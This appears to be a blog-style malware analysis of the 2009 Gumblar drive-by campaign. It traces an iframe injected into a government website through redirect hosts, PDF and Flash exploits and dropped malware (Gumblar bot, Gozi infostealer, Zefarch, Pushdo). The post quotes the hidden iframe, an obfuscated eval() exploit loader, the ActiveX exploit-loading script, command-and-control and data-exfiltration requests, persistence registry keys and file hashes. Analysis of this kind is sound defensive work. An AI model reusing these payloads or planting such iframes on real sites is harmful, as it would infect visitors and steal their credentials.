- The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
- The iframes redirect to sites that host exploit code targteted against web browsers, browser plug-ins and 3rd party applications (IE, FF, Adobe Reader, WinZip, etc.)
- The exploits result in malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.)
- Credentials exfiltrated by infostealers (like FTP) are used to compromise additional web servers back in step #1.
Gumbar Exploit Analysis
The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).
<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.
http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf
The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.
http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5
http://liteautogreatest.cn/index.php Code
<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>
<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>
Malware Analysis
http://litehitscar.cn/load.php?id=5 (load.exe)
The request for load.php returns the binary file load.exe.
File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87
The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll
The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;
Rnd: 982306
Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:
eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..
************************************************************************
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112
************************************************************************
POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
guid=397089404
************************************************************************
The downloaded data creates 4 temp files:
C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe
wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:
C:\WINDOWS\system32\crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run
The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)
GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19
0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;
************************************************************************
GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive
************************************************************************
wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:
C:\WINDOWS\9129837.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"
The file 9129837.exe creates:
C:\WINDOWS\new_drv.sys
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]
The following services are stopped:
Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center
The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.
POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache
----------------------------28c6e728c6e728c6e7
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:
----------------------------28c6e728c6e728c6e7--
************************************************************************
GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache
----------------------------28cd6f28cd6f28cd6f
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....
----------------------------28cd6f28cd6f28cd6f—
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache
----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
load=1
----------------------------28ea2e28ea2e28ea2e--
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache
----------------------------297799297799297799
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache
----------------------------2a3ea22a3ea22a3ea2
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
confirm=1
----------------------------2a3ea22a3ea22a3ea2—
************************************************************************
wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:
C:\WINDOWS\psbdxt.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61
wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.
Creates:
C:\Documents and Settings\John\John.exe
A registry key is created to launch the malware at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
The malware connected to 94.247.2.95 (Latvia) for C2.
GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream
Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6
No comments:
Post a Comment